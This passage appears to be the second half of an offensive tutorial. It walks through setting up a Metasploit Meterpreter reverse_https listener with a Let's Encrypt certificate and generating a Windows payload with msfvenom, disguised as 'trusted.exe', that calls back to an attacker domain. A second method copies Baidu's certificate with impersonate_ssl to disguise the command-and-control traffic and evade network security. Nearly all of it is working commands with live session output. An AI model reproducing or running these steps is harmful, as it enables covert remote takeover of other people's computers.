- This certificate will not be renewed automatically. Autorenewal of --manual certificates requires the use of an authentication hook script (--manual-auth-hook) but one was not provided. To renew this certificate, repeat this same certbot command before the certificate's expiry date.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
If you like Certbot, please consider supporting our work by:
 * Donating to ISRG / Let's Encrypt:   https://letsencrypt.org/donate
 * Donating to EFF:                    https://eff.org/donate-le
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
root@iZj6ccx9c36agbjm7ekf9mZ:~# 
           

Tip: a simple HTTP server started with Python can serve the challenge file for certificate validation

root@iZj6ccx9c36agbjm7ekf9mZ:~# cd /tmp/
root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# mkdir -p ./.well-known/acme-challenge/
root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# echo "T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss.a7_kMa1Et_Zx_p1td4C3YkGUV2qWL7zEYzWZQvki65c" >> ./.well-known/acme-challenge/T7KRVQLWe0vtRB7zfsiDqgZ2ld66mCBSNHJbmCV77ss
root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

The generated certificate is in the /etc/letsencrypt/live/yourdomain/ directory:

root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# ls /etc/letsencrypt/live/gpt5.onl/
cert.pem  chain.pem  fullchain.pem  privkey.pem  README
           

Create a combined certificate file containing privkey.pem and cert.pem using cat:

root@Z:/tmp# cd /etc/letsencrypt/live/gpt5.onl/
root@Z:/etc/letsencrypt/live/gpt5.onl# cat privkey.pem cert.pem >> /root/msfcert.pem
           

3. Install metasploit-framework on the cloud server

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
           

4. Set up the listener and payload

Configure the listener and payload; set StagerVerifySSLCert to true so the stager verifies the SSL certificate, and set EnableStageEncoding so the second-stage payload is encoded.

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf6 exploit(multi/handler) > set LHOST gpt5.onl
LHOST => gpt5.onl
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set HandlerSSLCert /root/msfcert.pem
HandlerSSLCert => /root/msfcert.pem
msf6 exploit(multi/handler) > set StagerVerifySSLCert True
StagerVerifySSLCert => True
msf6 exploit(multi/handler) > set EnableStageEncoding true
EnableStageEncoding => true
msf6 exploit(multi/handler) > exploit 

[-] Handler failed to bind to 8.217.125.192:443
[*] Started HTTPS reverse handler on https://0.0.0.0:443
           

The "Handler failed to bind to 8.217.125.192:443" line is expected on a cloud host: the public address is NAT-mapped to the instance rather than assigned to a local interface (the instance's own address is 172.26.166.192, as the session line later shows), so the handler falls back to 0.0.0.0:443, which still receives the traffic. Open https://yourdomain in a browser; the HTTPS padlock and the "It works" page confirm the certificate is set up correctly.


5. Next, create the payload, using your domain name as LHOST

root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# msfvenom -p windows/meterpreter/reverse_https LHOST=gpt5.onl LPORT=443 -f exe -o trusted.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 678 bytes
Final size of exe file: 73802 bytes
Saved as: trusted.exe
root@iZj6ccx9c36agbjm7ekf9mZ:/tmp# 
           

6. Run the generated payload on the target; the session comes back successfully

[*] Started HTTPS reverse handler on https://0.0.0.0:443
[!] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Without a database connected that payload UUID tracking will not work!
[*] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Meterpreter will verify SSL Certificate with SHA1 hash 9c6ad9e3e5b14efa789b493030c649367c0537f3
[*] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Encoded stage with x86/shikata_ga_nai
[*] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Staging x86 payload (176761 bytes) ...
[!] https://gpt5.onl:443 handling request from 58.20.23.45; (UUID: ezhwevva) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.26.166.192:443 -> 101.21.29.45:24225) at 2023-04-19 09:37:58 +0800

meterpreter > getuid
Server username: DESKTOP-RUJ38GQ\win10
           

#Other

Another, simpler way to get past network security solutions is to impersonate an SSL certificate with the HTTP SSL Certificate Impersonation auxiliary module and then use it to encrypt the traffic between the payload and the listener. First we impersonate a certificate, meaning we copy a remote SSL certificate and create a local (self-signed) version using the information from the remote one. Note that only the certificate fields are copied; the copy is signed with a locally generated key, so it fails chain validation against any trusted CA, and inspection of the issuer chain distinguishes it from the genuine certificate. Here we impersonate the certificate of www.baidu.com:

msf6 exploit(multi/handler) > use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set RHOSTS www.baidu.com
RHOSTS => www.baidu.com
msf6 auxiliary(gather/impersonate_ssl) > run
[*] Running module against 180.101.50.242

[*] 180.101.50.242:443 - Connecting to 180.101.50.242:443
[*] 180.101.50.242:443 - Copying certificate from 180.101.50.242:443
/C=CN/ST=beijing/L=beijing/OU=service operation department/O=Beijing Baidu Netcom Science Technology Co., Ltd/CN=baidu.com 
[*] 180.101.50.242:443 - Beginning export of certificate files
[*] 180.101.50.242:443 - Creating looted key/crt/pem files for 180.101.50.242:443
[+] 180.101.50.242:443 - key: /root/.msf4/loot/20230418204922_default_180.101.50.242_180.101.50.242_k_901740.key
[+] 180.101.50.242:443 - crt: /root/.msf4/loot/20230418204922_default_180.101.50.242_180.101.50.242_c_291923.crt
[+] 180.101.50.242:443 - pem: /root/.msf4/loot/20230418204922_default_180.101.50.242_180.101.50.242_p_080465.pem
[*] Running module against 180.101.50.188
[*] 180.101.50.188:443 - Connecting to 180.101.50.188:443
[*] 180.101.50.188:443 - Copying certificate from 180.101.50.188:443
/C=CN/ST=beijing/L=beijing/OU=service operation department/O=Beijing Baidu Netcom Science Technology Co., Ltd/CN=baidu.com 
[*] 180.101.50.188:443 - Beginning export of certificate files
[*] 180.101.50.188:443 - Creating looted key/crt/pem files for 180.101.50.188:443
[+] 180.101.50.188:443 - key: /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_k_649340.key
[+] 180.101.50.188:443 - crt: /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_c_069464.crt
[+] 180.101.50.188:443 - pem: /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem
[*] Auxiliary module execution completed
           

Now that we have the certificate, we can use MSFvenom to create our payload, embedding the certificate via the HandlerSSLCert and StagerVerifySSLCert options:

msfvenom -p windows/meterpreter_reverse_https LHOST=120.26.195.237 LPORT=443 HandlerSSLCert=/root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem StagerVerifySSLCert=true -f exe -o payload.exe
           

Set up the listener

msf6 auxiliary(gather/impersonate_ssl) > use exploit/multi/handler
[*] Using configured payload windows/meterpreter/reverse_https
msf6 exploit(multi/handler) >  set PAYLOAD windows/meterpreter_reverse_https
PAYLOAD => windows/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 120.26.195.237
LHOST => 120.26.195.237
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) >  set HandlerSSLCert /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem
HandlerSSLCert => /root/.msf4/loot/20230418204922_default_180.101.50.188_180.101.50.188_p_593798.pem
msf6 exploit(multi/handler) > set StagerVerifySSLCert true
StagerVerifySSLCert => true
msf6 exploit(multi/handler) > exploit 

[*] Meterpreter will verify SSL Certificate with SHA1 hash f5b5b2aa2001fa7cff8b37816d2597292d1edc31
[-] Handler failed to bind to 120.26.195.237:443
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[!] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Without a database connected that payload UUID tracking will not work!
[*] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Redirecting stageless connection from /RfPa2IPcyDJjR2JGB3nw1ApGWGhCwCJxnyNGBnyDCbiuvoUJt9qgog57OU5nrKQfzZdcfzuMA4A2SvObJnZ8eNyx6WI2WnMnGuCGuuaZYebjnnbieRn5 with UA 'Mozilla/5.0 (Windows NT 9.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36'
[!] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Without a database connected that payload UUID tracking will not work!
[*] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Attaching orphaned/stageless session...
[!] https://120.26.195.237:443 handling request from 102.227.59.19; (UUID: mynlncwc) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.23.240.156:443 -> 102.227.59.19:58210) at 2023-04-18 20:56:54 +0800

meterpreter > 

           

Run the payload on the target machine.

A session is received.
